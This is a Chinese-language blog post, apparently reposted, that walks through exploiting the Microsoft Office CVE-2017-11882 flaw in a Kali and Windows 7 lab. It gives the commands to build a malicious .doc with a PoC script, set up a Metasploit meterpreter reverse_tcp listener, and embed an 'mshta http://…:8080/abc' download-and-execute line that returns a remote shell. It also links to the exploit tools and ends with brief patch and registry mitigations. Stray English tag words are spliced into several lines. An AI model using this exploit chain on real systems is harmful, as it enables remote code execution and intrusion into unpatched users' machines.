CVE-2017-11882漏洞利用
CVE-2017-11882漏洞利用html
最新Office的CVE-2017-11882的poc剛剛發佈出來,讓人眼前一亮,完美無彈窗,無視宏,影響Ms offcie全版本,對於企業來講危害很大。在此簡單說下這個漏洞的復現和利用過程。python
POC地址:https://github.com/Ridter/CVE-2017-11882/git
下載Command43b_CVE-2017-11882.py腳本文件(文末分享雲盤連接)。
github
使用的方法很簡單,執行下面命令,生成漏洞doc文件。shell
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.docwindows
使用office 2013打開,直接執行。session
關於怎麼進一步利用,能夠利用msf進行攻擊。tcp
這裏有個小技巧,由於命令長度有43字符的限制,可使用URIPATH設置路徑,儘可能短一點,避免加起來超過43字符。ui
這裏我仔細說一下,但願每一個人都能看懂。url
準備階段:
kali:192.168.104
win7:192.168.1.132
win7裏面的doc文件能夠用office打開。個人win7虛擬機用的是office2013(文末分享)
首先打開kali,查看 IP,能夠看到個人虛擬機kali的 IP是192.168.1.104。把Command43b_CVE-2017-11882.py下載下來放kali的桌面就能夠。接下來就要把PS_shell.rb文件下載下來。就把PS_shell.rb和ms17-010.rb放一塊兒吧。
ms17-010.rb文件的路徑是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb,把PS_shell.rb放smb下面,和ms17-010在一塊兒。
準備工做作好了,接下來就是msf上場了。
輸入msfconsole,而後reload_all,從新加載全部模塊。
接下來輸入命令:search PS_shell
use /exploits/windows/smb/PS_shell
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.104
set uripath abc
exploit
會出現 started reverse tcp hander on 192.168.1.104:4444
using url,local ip,,,
mshta.exe "http://192.168.1.104:8080/abc"
接下來就到了 Command43b_CVE-2017-11882.py 上場了。
前面說到,咱們是把py文件放 kali 桌面的,因此在 kali 執行的時候路徑要注意。
cd Desktop
輸入命令:python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.104:8080/abc" -o test.doc
會在同目錄生成 test.doc 文件。
而後複製到 win7裏面用 office2013 打開。
win7 打開的時候,msf 輸入 sessions
成功返回 shell。
具體請看截圖,至此CVE-2017-11882漏洞利用結束,下面還能夠進行一系列滲透了。
修復方案:
1.下載微軟對此漏洞補丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882,而且開啓自動更新功能
2.在註冊表中禁用該漏洞模塊
reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400
Command43b_CVE-2017-11882.py:(連接: https://pan.baidu.com/s/1hslbc80 密碼: 5ap6)
PS_shell.rb:(連接: https://pan.baidu.com/s/1gfF5jmN 密碼: rkwy)
office2013:(連接: https://pan.baidu.com/s/1eSElsrC 密碼: q66f)
本文連接(http://www.cnblogs.com/Oran9e/p/7880832.html),轉載請註明。
任重而道遠!
- 1. 漏洞利用
- 2. AJP13漏洞利用
- 3. redis漏洞利用
- 4. Dedecms5.7漏洞利用
- 5. nginx漏洞利用
- 6. kubelet漏洞利用
- 7. metaspliot漏洞利用
- 8. 漏洞利用與提權(二):Linux漏洞利用與提權
- 9. 漏洞利用——Sun-AnswerBook
- 10. CVE 2019-0708 漏洞利用
- 更多相關文章...
- • Maven Web 應用 - Maven教程
- • XML 用途 - XML 教程
- • Composer 安裝與使用
- • 使用Rxjava計算圓周率
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 字節跳動21屆秋招運營兩輪面試經驗分享
- 2. Java 3 年,25K 多嗎?
- 3. mysql安裝部署
- 4. web前端開發中父鏈和子鏈方式實現通信
- 5. 3.1.6 spark體系之分佈式計算-scala編程-scala中trait特性
- 6. dataframe2
- 7. ThinkFree在線
- 8. 在線畫圖
- 9. devtools熱部署
- 10. 編譯和鏈接
- 1. 漏洞利用
- 2. AJP13漏洞利用
- 3. redis漏洞利用
- 4. Dedecms5.7漏洞利用
- 5. nginx漏洞利用
- 6. kubelet漏洞利用
- 7. metaspliot漏洞利用
- 8. 漏洞利用與提權(二):Linux漏洞利用與提權
- 9. 漏洞利用——Sun-AnswerBook
- 10. CVE 2019-0708 漏洞利用